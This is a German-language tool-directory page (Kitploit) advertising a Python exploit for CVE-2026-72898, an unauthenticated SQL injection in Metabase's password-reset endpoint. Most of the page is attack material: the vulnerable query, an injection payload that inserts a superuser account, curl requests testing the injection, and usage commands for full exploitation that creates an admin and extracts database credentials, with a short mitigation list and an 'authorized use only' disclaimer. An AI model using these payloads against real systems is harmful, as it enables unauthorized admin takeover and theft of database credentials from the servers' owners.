Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-72898 — Python-Exploit für CVE-2026-72898, eine unauthentifizierte SQL-Injection im Passwort-Reset-Endpunkt von Metabase, die Admin-Konten erstellt und Datenbank-Zugangsdaten extrahiert. | Kitploit
Tools/GitHubGitHub/34zy/cve-2026-72898
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsRed TeamingDatenbanksicherheit
GitHub34zy/cve-2026-72898

CVE-2026-72898

Python-Exploit für CVE-2026-72898, eine unauthentifizierte SQL-Injection im Passwort-Reset-Endpunkt von Metabase, die Admin-Konten erstellt und Datenbank-Zugangsdaten extrahiert.

vor 6h 12mNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Metabase SQL-Injection RCE

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

Nicht authentifizierte SQL-Injection im Metabase-Endpunkt /api/session/reset_password. Erstellt Admin-Konten und extrahiert Datenbank-Anmeldedaten.

Betroffen: v58.0 - v63.3 | Gepatcht: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


Schnellstart

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

Die Schwachstelle

String-Verkettung in SQL-Abfrage:

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

Angriffs-Payload:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

Verwendung

Nur prüfen (keine Modifikation):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

Vollständige Ausnutzung:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

Manuelles Testen:

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

Was es tut

  1. Erkennt Metabase-Instanz (boolean-basierte SQLi)
  2. Erstellt Admin-Benutzer via SQL-Injection
  3. Authentifiziert sich mit neuem Admin
  4. Extrahiert Anmeldedaten der verbundenen Datenbank
  5. Verifiziert vollständige Systemkompromittierung

Auswirkung

  • Nicht authentifizierter Admin-Zugriff
  • Extraktion von Datenbank-Anmeldedaten
  • Kompromittierung der verbundenen Datenbank
  • Vollständige Anwendungskontrolle

Gegenmaßnahmen

SOFORT:

  • Upgrade auf gepatchte Version
  • Blockiere /api/session/reset_password via WAF
  • Prüfe Admin-Konten auf unbefugte Hinzufügungen
  • Rotiere alle Datenbank-Anmeldedaten

SPÄTER:

  • Verwende parametrisierte Abfragen
  • Füge Eingabevalidierung hinzu
  • Implementiere Authentifizierung an allen sensiblen Endpunkten
  • Aktiviere SQL-Abfrage-Logging

Links

  • GitHub Advisory
  • NVD CVE Entry

Nur autorisierte Nutzung. Unbefugter Zugriff ist illegal.

Tool herunterladen